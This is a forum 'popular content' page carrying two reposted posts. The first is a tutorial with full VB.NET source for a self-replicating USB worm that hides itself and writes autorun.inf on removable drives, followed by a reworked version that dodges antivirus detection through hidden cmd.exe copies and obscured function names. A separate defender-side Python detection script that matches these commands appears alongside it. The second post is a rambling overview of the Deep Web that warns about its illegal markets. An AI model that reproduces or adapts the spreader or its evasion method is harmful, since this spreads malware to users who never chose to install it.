
Leaderboard

Popular Content

Showing content with the highest reputation on 09/21/12 in all areas

  1. Some Basics and Overview

Usually when we talk about bypassing antivirus software, and especially when we talk about antivirus programs like NOD32, Kaspersky, BitDefender... we automatically think about deep coding knowledge, using undocumented APIs or using zero-day exploits, but this is not always true, since by applying some "very" basic approaches we will be able to bypass most (if not all) antivirus programs, at least for doing some basic things.

Basically, all antivirus programs detect malicious files the same way, either by checking for a digital signature inside the files (which explains the importance of keeping your antivirus up to date) or by a technique called heuristic detection. This (and of course other criteria) usually makes the difference between a good and a bad antivirus.

Signature detection

Technically, when an antivirus starts looking for a signature, it looks for "string(s)" found by antivirus research labs and considered a fingerprint that a malicious program's code may have. Every single virus, worm or other malware has its own signature, and considering the fact that there are billions of malicious files in the world, and more and more malware developers, looking for a specific signature becomes almost impossible, so antivirus labs and malware analysts started to give a kind of generic signature to help find a type of malicious program, rather than the "one by one" way. Even using generic signatures, this detection mode is still archaic due to the diversity of ways to protect malware from being detected. Complex packers, custom encryption or polymorphism make this way of detection not 100% reliable, especially when it comes to detecting totally new viruses or very complex ones.

Heuristic detection

Almost all recent antivirus software has a heuristic detection mode which consists (in a very simple way) of simulating a file's execution, then monitoring whether this file performs any suspicious activities like replication, file injection, file downloading or hiding files from Explorer. This is quite clever, but may generate a lot of false positive detections, since heuristic analysis is a kind of multi-criteria analysis based in most cases on "already known" code, classes, methods, functions or commands that are not usually implemented in widely used programs. This may be considered a kind of weakness that would, and will be, exploited (later in this article) to avoid detection by this way of analysis, since at this stage, bypassing heuristic analysis is bypassing the whole antivirus, because every "fully" newly coded malware is totally unknown to the antivirus and will not be detectable instantly via a digital signature.

The problem is not coding a harmful program; the real problem is spreading it out! As is known, the aim of any malicious program coder is to infect or take control of the largest possible number of computers, and this cannot be done manually, so almost every virus, worm, botnet, etc. has one or more ways to propagate implemented as functionality! And one of the most common modes used is self-spreading via removable disks like USB flash drives. The idea is quite simple: the malware will check periodically for removable disks (USB keys, memory cards, and even some external hard drives). If found, it will copy itself (a replication of the original malware) onto them under an appealing name or a random one, but hides itself from Explorer by changing the file attributes, and will create an Autorun.inf file which will run the replication every time this removable disk is plugged into a computer.

Our Main Goal

For every new generation of antivirus software, this behavior will be flagged as suspicious or malicious and will be detected in most cases as Trojan horse Dropper.Generic, Trojan.Generic or something similar! We will see how we can make a fully undetectable USB spreader, without any obfuscation or encryption, just by doing the same thing in a way that Kaspersky's heuristic analysis does not consider "malicious behavior". I'll use VirusTotal to analyze the generated files (even if it's not important, since our program is not really harmful) and all upcoming tests are made under Windows 7 Ultimate with the trial version of Kaspersky Internet Security 11.0.2.556 installed. All code is in VB.NET using Framework 4, which is an uncommon language for coding malicious stuff, but it's wise to say that some serious worms, viruses and remote administration tools were done using VB, VB.NET or VBScript. Anyway, let's make a USB dropper "the normal way" and see how it's seen by VirusTotal and Kaspersky's heuristic analysis.

The Game

Let's start by making a basic USB spreader. If you want to run tests, just create a new project under Microsoft Visual Studio, make sure you import System.Threading and System.IO, then copy and paste this code:

```vbnet
Imports System.Threading
Imports System.IO

Public Class Form1
    Shared ReplicatedName As String = "USBsetup.exe"

    Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
        StartUSBspreading()
    End Sub

    Sub StartUSBspreading()
        Try
            Do
                Dim Alldrives() As DriveInfo = DriveInfo.GetDrives()
                For Each DriveFound As DriveInfo In Alldrives
                    If DriveFound.DriveType = "2" And DriveFound.IsReady = True Then
                        System.IO.File.Copy(Application.ExecutablePath, DriveFound.RootDirectory.ToString & ReplicatedName, True)
                        File.SetAttributes(DriveFound.RootDirectory.ToString & ReplicatedName, FileAttributes.Hidden)
                        AutorunMaker(DriveFound)
                    End If
                Next DriveFound
                Thread.Sleep(6000)
            Loop
        Catch ex As Exception
        End Try
    End Sub

    Public Shared Sub AutorunMaker(ByVal driveFound As DriveInfo)
        Try
            File.Delete(Convert.ToString(driveFound.RootDirectory) & "autorun.inf")
            Dim AutorunStreamWriter As New StreamWriter(Convert.ToString(driveFound.RootDirectory) & "autorun.inf")
            AutorunStreamWriter.WriteLine("[autorun]")
            AutorunStreamWriter.WriteLine("shellexecute=" & ReplicatedName)
            AutorunStreamWriter.Flush()
            AutorunStreamWriter.Close()
            File.SetAttributes(Convert.ToString(driveFound.RootDirectory) & "autorun.inf", FileAttributes.Hidden)
        Catch ex As Exception
        End Try
    End Sub
End Class
```

Instead of using direct APIs like WM_DEVICECHANGE that notify you about hardware device changes, and to avoid the use of controls like timers, malicious program coders usually use infinite loops that look for removable disks and sleep for a few seconds, just like what happens in this case. On program load, StartUSBspreading() is called; it gets all detected drives, then looks only for removable ones. If the drive found is ready, the program makes a replication of itself and an autorun.inf file that will load the replicated file, and hides both of the newly made files.

VirusTotal did not return really useful information, since it only performs a static analysis:

File name: MyTestApp.exe
Detection ratio: 1 / 42

Antivirus | Result | Update
Jiangmin | Trojan/Generic.niew | 20120904
Kaspersky | - | 20120904

https://www.virustotal.com/file/497571ba2d8a51ae4a3f7ce3a9746fef3563bd18ed4cf126d4b1b34d4bcdcf9f/analysis/1346767444

With a detection ratio of 1/42 we may say that we already have an interesting achievement, but when running Kaspersky's heuristic analysis it detects our program, which has no digital signature, as a high-risk program and neutralizes the threat.

Figure 1: Behavior similar to PDM.Trojan.generic detected

At this stage we can consider several changes to our code that may lead to a decreased detection rate, like using classes and modules, but one of the most powerful (and easiest) techniques is renaming as many of the functions, subs and events used as possible. We said that heuristic analysis is based on already known stuff, and almost all malicious programs do the same things, like damaging your computer, stealing personal data or spying on your activities... and most of these aims are reached using some common pieces of code. For example, to make a keylogger you will probably use APIs like SetWindowsHookEx and events like Hook_Keyboard(), and by changing sub and function names to some common ones (like BooksManagers(), Baby, Chat_System(), etc.) malicious coders reach an unexpected detection ratio! Renaming already known functions and subs can actually decrease the detection ratio very considerably. Our sample is just a few lines of code, and renaming subs will not bypass Kaspersky. Let's think about this for a second; our objective is clear: making a replication of our program and an Autorun.inf file on any plugged-in removable disk.

Instead of using suspicious methods like File.Copy() and File.Delete(), we can possibly make Kaspersky and most antivirus programs believe that it's the user who copied or deleted files, by using another intermediary program that requires almost no privilege: the Windows CMD command line (executable cmd.exe). By invoking the Windows command line silently, we can do everything that could be done via the command line without any restrictions! We can make a thread that creates the autorun.inf file temporarily somewhere in the user's system folder, and another thread that checks for the presence of plugged-in removable disks and runs copy tasks via hidden instances of the command line. This may seem strange, but after some tests I made, using weird names for functions, procedures and methods may also help decrease the detection ratio. Here is the new code for our USB dropper:

```vbnet
Imports System.Threading
Imports System.IO

Public Class Form1
    Dim MyPogramPath As String = Application.ExecutablePath
    Dim MyAutPath As String = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) & "\microsoft\autorun.inf"
    Dim mo As New Thread(AddressOf makdeotrn)
    Dim k1 As New Thread(AddressOf kaynaChiKle)

    Sub OnchorhaWalakal2ajr(ByVal d As String)
        Try
            If Not IO.File.Exists(d & "Flash_Update.exe") Then
                Dim Proc As New Process()
                Proc.StartInfo.FileName = "cmd.exe"
                Proc.StartInfo.Arguments = "/c copy " & """" & MyPogramPath & """" & " " & """" & d & "Flash_Update.exe"
                Proc.StartInfo.WindowStyle = ProcessWindowStyle.Hidden
                Proc.StartInfo.CreateNoWindow = False
                Proc.Start()
                Proc.WaitForExit()
                Proc.Close()
                FileSystem.SetAttr(d & "Flash_Update.exe", FileAttribute.Hidden)
            End If
        Catch ex As Exception
        End Try
    End Sub

    Sub OnchorhaWalakal2ajr2(ByVal d As String)
        Try
            Dim Proc As New Process()
            Proc.StartInfo.FileName = "cmd.exe"
            Proc.StartInfo.Arguments = "/c copy " & """" & MyAutPath & """" & " " & d
            Proc.StartInfo.WindowStyle = ProcessWindowStyle.Hidden
            Proc.StartInfo.CreateNoWindow = False
            Proc.Start()
            Proc.WaitForExit()
            Proc.Close()
            FileSystem.SetAttr(d & "autorun.inf", FileAttribute.Hidden)
        Catch ex As Exception
        End Try
    End Sub

    Sub kaynaChiKle()
a:
        Dim kle() As DriveInfo = DriveInfo.GetDrives()
        For Each found As DriveInfo In kle
            If found.DriveType = "2" And found.IsReady = True Then
                Try
                    OnchorhaWalakal2ajr2(found.RootDirectory.ToString)
                    OnchorhaWalakal2ajr(found.RootDirectory.ToString)
                Catch ex As Exception
                End Try
            End If
        Next found
        GoTo a
    End Sub

    Public Sub MakDeOtrn()
        Try
            Dim appdata As String = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) & "\microsoft\"
            Dim sw As New StreamWriter(appdata & "autorun.inf")
            Dim s As String = appdata & "autorun.inf"
            If IO.File.Exists(s) Then
                Try
                    IO.File.Delete(s)
                Catch ex1 As Exception
                End Try
            End If
            sw.WriteLine("[autorun]")
            sw.WriteLine("shellexecute=" + "Flash_Update.exe")
            sw.Flush()
            sw.Close()
        Catch ex As Exception
        End Try
    End Sub

    Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
        mo.IsBackground = True
        mo.Start()
        k1.IsBackground = True
        k1.Start()
    End Sub
End Class
```

Some explanation for the code above:

1. MakDeOtrn() will make autorun.inf in "C:\Users\UserName\AppData\Roaming\microsoft", designed to run a file called "Flash_Update.exe".
2. OnchorhaWalakal2ajr() checks whether the removable disk is not infected yet; if true, we set the application that we want to start, which is cmd.exe, set the command-line arguments that will copy the running program (our malicious program) to the removable disk found under the name "Flash_Update.exe", and of course start cmd.exe in a hidden window and wait until the end of the copying process to hide the replicated file from Explorer.
3. OnchorhaWalakal2ajr2() does the same thing as #2 for "autorun.inf".
4. kaynaChiKle() will check infinitely for the presence of removable disks; if one is found, it calls procedures #3 and #2 respectively.

Before testing this newly generated program, VirusTotal now considers it a clean file with a detection ratio of 0/41, as you can see from this link: www.virustotal.com/file/62254a2968b9a9385a9510431b8023fa2db50b572b6c5d76fdfea0234df8ea03/analysis/1346780514/

Scanning our program with Kaspersky reveals absolutely nothing:

Figure 2: No threat has been detected

After starting it, our program spreads itself as seen in the screenshot.

To Conclude...

We can make fully undetectable Download and Execute programs, even some silent Download and Install programs and some really silent adware, and this with absolutely no deep coding knowledge, and the worst is that this simple technique seems to bypass all known antivirus (tested with 5 well-known antivirus products, and further tests are to come), and we can make our spreader even more difficult to detect by encrypting or obfuscating it. Complicated things like bypassing antivirus, especially those like Kaspersky, NOD32, BitDefender or AntiVir, may not need to be done the complicated way; the example of this USB spreader may let us conclude that as smart as an antivirus and its analysis are, there is always a "simple" way to cheat it.

Source: http://resources.infosecinstitute.com/antivirus-evasions-the-making-of-a-full-undetectable-usb-dropper-spreader/
    1 point
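As an added defender-side example (not code from the article or the forum post), the following Python triage checks the two tell-tale artifacts the post describes: an autorun.inf whose launch key points at a hidden executable in the drive root, and a process spawning cmd.exe /c copy to replicate its own image or drop autorun.inf onto a drive root. The sample autorun.inf text and the (ParentImage, CommandLine) process-creation records are constructed here; the record shape is an assumption about how such logs were exported.

```python
import re
from typing import Dict, List, Set, Tuple
# autorun.inf keys that launch a program when AutoRun is still enabled for removable media
LAUNCH_KEYS = {"open", "shellexecute", "shell\\open\\command"}
EXEC_EXT = (".exe", ".scr", ".com", ".bat", ".cmd", ".vbs", ".pif")

def parse_autorun(text: str) -> Dict[str, str]:
    """Return the key=value pairs of the [autorun] section, keys lowercased."""
    section, entries = None, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
        elif section == "autorun" and "=" in line:
            key, _, value = line.partition("=")
            entries[key.strip().lower()] = value.strip()
    return entries

def autorun_findings(text: str, hidden_names: Set[str]) -> List[str]:
    """Flag launch entries that run an executable, and launch targets whose names are in hidden_names
    (root-directory files found to carry the Hidden attribute, collected separately)."""
    hidden = {h.lower() for h in hidden_names}
    findings = []
    for key, value in parse_autorun(text).items():
        parts = value.strip('"').split()
        if key not in LAUNCH_KEYS or not parts:
            continue
        target = parts[0]
        if target.lower().endswith(EXEC_EXT):
            findings.append(f"{key} launches executable {target}")
        if target.lower() in hidden:
            findings.append(f"launch target {target} is hidden")
    return findings

# "cmd.exe /c copy <src> <dst>"; the optional quotes also accept the unbalanced closing quote
# that the post's second sample builds into its argument string.
COPY_RE = re.compile(
    r'^"?(?:.*\\)?cmd(?:\.exe)?"?\s+/c\s+copy\s+"?([^"]+?)"?\s+"?([A-Za-z]:\\[^"\s]*)', re.I)

def copy_findings(parent_image: str, cmdline: str) -> List[str]:
    """Flag a cmd.exe copy that replicates its parent's image or drops autorun.inf on a drive root."""
    m = COPY_RE.match(cmdline.strip())
    if not m:
        return []
    src, dst = m.group(1), m.group(2)
    findings = []
    if src.lower() == parent_image.lower():
        findings.append("copies the parent process's own image (self-replication)")
    if src.lower().endswith("autorun.inf") or dst.lower().endswith("autorun.inf"):
        findings.append("writes autorun.inf")
    if findings and re.fullmatch(r"[A-Za-z]:\\[^\\]*", dst):
        findings.append(f"destination is the root of drive {dst[:2]}")
    return findings

# Constructed process-creation records (ParentImage, CommandLine): the first two mirror the
# post's second sample, the third is benign user activity that must not be flagged.
SAMPLE_RECORDS: List[Tuple[str, str]] = [
    (r"C:\Users\bob\MyTestApp.exe",
     r'cmd.exe /c copy "C:\Users\bob\MyTestApp.exe" "E:\Flash_Update.exe'),
    (r"C:\Users\bob\MyTestApp.exe",
     'cmd.exe /c copy "C:\\Users\\bob\\AppData\\Roaming\\microsoft\\autorun.inf" E:\\'),
    (r"C:\Windows\explorer.exe", r'cmd.exe /c copy "C:\temp\notes.txt" "D:\backup\notes.txt"'),
]
SAMPLE_AUTORUN = "[autorun]\nshellexecute=Flash_Update.exe\n"  # constructed, as the sample writes it

def triage(records: List[Tuple[str, str]] = SAMPLE_RECORDS) -> List[int]:
    """Indexes of the records that match the spreader pattern (the sample yields [0, 1])."""
    return [i for i, (parent, cmd) in enumerate(records) if copy_findings(parent, cmd)]
```

On a live Windows host the hidden_names set would come from os.stat(...).st_file_attributes on the drive root, and the records from process-creation telemetry such as Sysmon Event ID 1 or Security event 4688.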
  2. This information is found on the internet, and there are also several topics posted on the same subject. But I found this information quite good and explanatory, and it even brings a video tutorial. I want to inform this forum that this information does not incite others to commit crimes; it is pure information so that users are aware of the dangers that exist on the Internet, and so that users who are aware of this are more careful where they surf. First of all, I am not responsible for the use given to this information to access this site; it is assumed that they are adults and have "certain" knowledge of the Internet. This post is for information only and is no incentive for users to make contact with any of the illegal activities that can be found on the Deep Web.

The Deep Web - Dark Side of the Internet - THE WEB IS DEEP

The Deep Web or Invisible Web (in English: Deepnet, Invisible Web, Hidden Web or Dark Web) is the name given to all Internet content that is not part of the Surface Internet, i.e. the network pages indexed by Internet search engines. This is due to the limitations of the network in accessing all websites, for various reasons.

How did the Deep Web originate?

The Deep Web, called the Invisible Web in 1994, was given this name in 2001 because it is not directly accessible through the primary surface means of navigation of those times. The reason for this is usually divided into three factors. The first is technical or inadvertent, and is due to a lack of upgrading to new indexing standards or to the dynamic nature of a website (content changing constantly, renewed through visitor interaction, etc.). The second case is that of private and protected sites, or those containing documents in formats that cannot be indexed.
In these two cases, the search engine will not find in the code the content its robots can associate and refer to directly as static, or it cannot access the protected databases (libraries, dictionaries, etc.), and thus it "will pass" on that site. The other case involves a deliberate decision, because the developer himself can tell the search engine not to check his code periodically for changes, through a variable such as Follow / No Follow in the case of Google. If No Follow is chosen, the robots ignore the site and it will remain hidden, invisible, in the depths to which few have access.

Having defined the Surface Web and the Deep Web, the question arises: what is in all this that we do not see? What are we missing? To understand what is at the bottom, it is best to imagine that only in 2001 (when personal sites like blogs and the like had not exploded at all) the information to be found on the Deep Web was 500 times greater than on the surface, the former taking 91,000 Terabytes against 197. Extrapolating the numbers in a more traditional way (there is no current data about it, same for the Deep Web's properties), growth was undoubtedly immense, while recognizing that in 10 years tracking systems evolved a lot, and gigas and gigas of the profound Network are now visible.

Substantively, the Deep Web is made up of all kinds of information, and since it is so multiple, categorization becomes mandatory. Thus, among what is not on the surface, we have file formats that are not of HTML or text type (the primary failure of complete websites in Flash) and some multimedia documents that are not indexed. As mentioned earlier, dynamic content will be plentiful, as well as private or personal sites. Also, access to the so-called contextual web varies by whom or from where the visit is made, and do not forget the content limited through techniques, etc.

THE DARK SIDE OF THE WEB

After reading the above you have probably been thinking that maybe the most shocking of all that is left out of the search engines was missing, and in this respect the illegal and the forbidden take a leading role in harnessing the intentions of the Deep Web. Thus, in it you get to find places where drugs, weapons and even criminal services are traded. There is also a place for the exchange of pedophilia and any other illegal activity; you have to stay very attentive, because as well as contributing passively to these horrific practices continuing to nurture a public, you will also be exposed to all kinds of cyber-threats. Do not discount the constant infiltration and investigation of security agencies on these sites. But not all is bad, because alongside the more objectionable aspects that hacking in general may have (as will be seen in sites that offer services to destroy servers, hack accounts, create viruses in community, etc.), knowledge about systems, security and much more is also shared, which is undoubtedly very interesting and generates no consequences for the average user.

S IN THE DEEP WEB

Well, for starters there is everything from useful things to the most atrocious and ill imaginable:

- Guides, phone lists, e-mail, and all kinds of directories;
- "People Finders", i.e. lists of professionals from all disciplines;
- Laws, decrees, general legal information, though some can be found on the static web;
- Patents;
- Dictionaries, glossaries, although many are available, and do not forget that Wikipedia has a bit of everything;
- Selling products through e-commerce;
- Graphics and multimedia files that do not have the keyword metadata that clearly identifies them;
- Business sites;
- Digital books and journals;
- Yellow or white pages (Yellow / White pages);
- Libraries;
- Bookstores.

The most dangerous things you can find:

- Sale of drugs (e.g., the Silk Road is a famous page deep within the site, which sells all kinds of drugs)
- Pornography, CP - this is highly dangerous and sick, so if at any time you see CP, DO NOT ENTER
- The option to hire hitmen
- Hackers (as I read, they easily take your IP, but this is under proxy, and they can also take most of the personal data of anyone)

Most of the transactions in the Deep Web are carried out with Bitcoins. You can buy virtually anything with this coin. Anyway, the question is whether it remains anonymous. (1 Bitcoin -> $14).

Deep web URLs are characterized by: being the set of so-called non-text files, i.e. media files, graphics, software, and Portable Document Format documents; having the .onion (unlike the "surface" sites ending in .com); being database content accessible via the web: the information is structured in tables of data created and managed with programs such as Access, Oracle, SQL Server, MySQL. This information can only be retrieved if it is requested by a query. To do this you must make a deposit, or log in to a special area of the site, sometimes free, sometimes paid. It has been estimated that the content of database sites is 500 times larger than the static web. These are the databases of companies, organizations and institutions, and can take the form of database management support, customer catalogs and even specialized bibliographic databases on particular themes: medical, business, space, and even virtual libraries of universities and research centers. It is said that this information is invisible, hidden or deep because search engines cannot enter them to extract the data.

ADVANTAGES AND DISADVANTAGES OF GOING DEEP INTO THE WEB

When you enter the Deep Web to search for information, the advantages take the podium; it has been shown that as the range of options open to choice increases, quality rates increase considerably.
Given the network conditions, and taking into account that the search engines are not necessarily qualifiers of quality information, it is more likely to find quality items in a database of 100,000 than in 1,000. When researching various topics, you get better and more original results with a search in this part of the web. Moreover, it is possible to identify the anonymity, privacy and opportunities it can give in situations of oppression and restriction of freedom of expression. Disadvantages could be represented by the difficulty of access to the invisible web for the most lay users, since the abundance of information and the processes you need to go through to access it could be overwhelming and uncomfortable (the amount of data currently in the Deep Web outweighs all printed information in the world). We also have to tell you how dangerous this part of the web is, since it is not controlled by standards, by the browsers themselves or by computer security organizations.

THINGS YOU SHOULD AVOID

First of all, we have as the initial one CP, because it can be harmful for you in many ways, in addition to affecting your mind, and secondly because it is illegal and they can condemn you all over the world for it. Disable images (for Chrome, enter advanced tools, privacy settings, disable images) in case of doubt; in the deep web there are many pedophiles and really unpleasant images. Disconnect the webcam or turn it the other way (e.g. to the wall). As I read, some hackers take control of webcams. Do not enter any BBS or forum that contains "CP" in its name, or enter anything related to porn. Know what we click on.

VISUAL VIDEO INFORMATION AND SUMMARY
    1 point
This leaderboard is set to Bucharest/GMT+02:00